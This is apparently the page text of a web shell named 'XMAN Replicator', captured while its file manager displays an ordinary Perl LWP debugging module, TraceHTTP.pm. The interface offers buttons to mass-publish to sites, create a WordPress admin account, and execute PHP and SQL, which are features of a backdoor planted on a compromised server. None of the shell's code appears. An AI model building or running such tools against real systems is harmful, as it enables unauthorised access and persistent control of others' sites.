🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
usr
/
local
/
share
/
perl5
/
LWP
/
Debug
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:17
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-21 11:50
🔄
🗑️
🗑️📁
⬇️
🔒
TraceHTTP.pm
601 B
-r--r--r--
2024-01-25 18:31
✏️
🔄
🗑️
⬇️
🔒
Edit: TraceHTTP.pm
package LWP::Debug::TraceHTTP; # Just call: # # require LWP::Debug::TraceHTTP; # LWP::Protocol::implementor('http', 'LWP::Debug::TraceHTTP'); # # to use this module to trace all calls to the HTTP socket object in # programs that use LWP. use strict; use parent 'LWP::Protocol::http'; our $VERSION = '6.76'; package # hide from PAUSE LWP::Debug::TraceHTTP::Socket; use Data::Dump 1.13; use Data::Dump::Trace qw(autowrap mcall); autowrap("LWP::Protocol::http::Socket" => "sock"); sub new { my $class = shift; return mcall("LWP::Protocol::http::Socket" => "new", undef, @_); } 1;
Save
PHP Console
Execute
SQL Console
Execute